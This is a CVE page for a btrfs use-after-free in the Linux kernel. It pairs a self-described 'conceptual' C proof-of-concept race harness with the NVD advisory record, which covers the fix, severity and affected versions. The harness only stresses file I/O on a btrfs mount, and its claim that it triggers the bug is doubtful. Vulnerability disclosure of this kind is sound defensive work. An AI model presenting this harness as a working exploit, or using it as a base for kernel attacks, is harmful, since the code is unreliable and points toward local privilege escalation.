CVE-2025-71159

/* * CVE-2025-71159 PoC - btrfs delayed_node use-after-free * This is a conceptual proof-of-concept demonstrating the race condition. * Actual exploitation requires kernel debugging and specific btrfs operations. * * Compile: gcc -o cve_poc cve_poc.c -lpthread * Run as low-privileged user on btrfs filesystem */ #include <stdio.h> #include <stdlib.h> #include <pthread.h> #include <unistd.h> #include <fcntl.h> #include <string.h> #define NUM_THREADS 4 #define NUM_ITERATIONS 10000 void *writer_thread(void *arg) { /* * Thread that triggers delayed node creation via btrfs operations. * This thread performs file operations that invoke btrfs_get_or_create_delayed_node(). * The race condition occurs when refcount is set inside the lock critical section. */ int fd; char filepath[256]; for (int i = 0; i < NUM_ITERATIONS; i++) { snprintf(filepath, sizeof(filepath), "/mnt/btrfs/test_file_%d", i % 100); fd = open(filepath, O_CREAT | O_WRONLY, 0644); if (fd >= 0) { write(fd, "test data", 9); /* Force delayed node allocation */ fsync(fd); close(fd); } } return NULL; } void *reader_thread(void *arg) { /* * Thread that attempts to access delayed nodes concurrently. * This can trigger the use-after-free when reading delayed_node * before refcount is properly set. */ int fd; char filepath[256]; for (int i = 0; i < NUM_ITERATIONS; i++) { snprintf(filepath, sizeof(filepath), "/mnt/btrfs/test_file_%d", i % 100); fd = open(filepath, O_RDONLY); if (fd >= 0) { /* * Read operations may access delayed_node concurrently. * Under race conditions, this can trigger the use-after-free. */ char buf[512]; read(fd, buf, sizeof(buf)); close(fd); } /* Small delay to increase race window */ usleep(1); } return NULL; } int main() { pthread_t threads[NUM_THREADS]; printf("CVE-2025-71159 PoC - btrfs delayed_node UAF\n"); printf("This PoC demonstrates concurrent access to btrfs delayed nodes.\n"); printf("Target: Linux kernel btrfs use-after-free in btrfs_get_or_create_delayed_node()\n"); /* Create writer threads */ for (int i = 0; i < NUM_THREADS / 2; i++) { pthread_create(&threads[i], NULL, writer_thread, NULL); } /* Create reader threads */ for (int i = NUM_THREADS / 2; i < NUM_THREADS; i++) { pthread_create(&threads[i], NULL, reader_thread, NULL); } /* Wait for all threads */ for (int i = 0; i < NUM_THREADS; i++) { pthread_join(threads[i], NULL); } printf("PoC execution completed. Check dmesg for use-after-free warnings.\n"); return 0; }

{"cve": {"id": "CVE-2025-71159", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-23T16:15:52.793", "lastModified": "2026-02-26T20:19:48.380", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix use-after-free warning in btrfs_get_or_create_delayed_node()\n\nPreviously, btrfs_get_or_create_delayed_node() set the delayed_node's\nrefcount before acquiring the root->delayed_nodes lock.\nCommit e8513c012de7 (\"btrfs: implement ref_tracker for delayed_nodes\")\nmoved refcount_set inside the critical section, which means there is\nno longer a memory barrier between setting the refcount and setting\nbtrfs_inode->delayed_node.\n\nWithout that barrier, the stores to node->refs and\nbtrfs_inode->delayed_node may become visible out of order. Another\nthread can then read btrfs_inode->delayed_node and attempt to\nincrement a refcount that hasn't been set yet, leading to a\nrefcounting bug and a use-after-free warning.\n\nThe fix is to move refcount_set back to where it was to take\nadvantage of the implicit memory barrier provided by lock\nacquisition.\n\nBecause the allocations now happen outside of the lock's critical\nsection, they can use GFP_NOFS instead of GFP_ATOMIC."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nbtrfs: soluciona la advertencia de uso después de liberación en btrfs_get_or_create_delayed_node()\n\nAnteriormente, btrfs_get_or_create_delayed_node() establecía el refcount del delayed_node antes de adquirir el bloqueo root-&gt;delayed_nodes. El commit e8513c012de7 ('btrfs: implementa ref_tracker para delayed_nodes') movió refcount_set dentro de la sección crítica, lo que significa que ya no hay una barrera de memoria entre el establecimiento del refcount y el establecimiento de btrfs_inode-&gt;delayed_node.\n\nSin esa barrera, los almacenamientos en node-&gt;refs y btrfs_inode-&gt;delayed_node pueden volverse visibles fuera de orden. Otro hilo puede entonces leer btrfs_inode-&gt;delayed_node e intentar incrementar un refcount que aún no ha sido establecido, lo que lleva a un error de refcounting y a una advertencia de uso después de liberación.\n\nLa solución es mover refcount_set de vuelta a donde estaba para aprovechar la barrera de memoria implícita proporcionada por la adquisición del bloqueo.\n\nDebido a que las asignaciones ahora ocurren fuera de la sección crítica del bloqueo, pueden usar GFP_NOFS en lugar de GFP_ATOMIC."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.18", "versionEndExcluding": "6.18.6", "matchCriteriaId": "B263F4AD-C03D-4E6A-995E-B822989C3A7A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*", "matchCriteriaId": "17B67AA7-40D6-4AFA-8459-F200F3D7CFD1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*", "matchCriteriaId": "C47E4CC9-C826-4FA9-B014-7FE3D9B318B2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*", "matchCriteriaId": "F71D92C0-C023-48BD-B3B6-70B638EEE298"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:*", "matchCriteriaId": "13580667-0A98-40CC-B29F-D12790B91BDB"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/83f59076a1ae6f5c6845d6f7ed3a1a373d883684", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/c8385851a5435f4006281828d428e5d0b0bbf8af", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}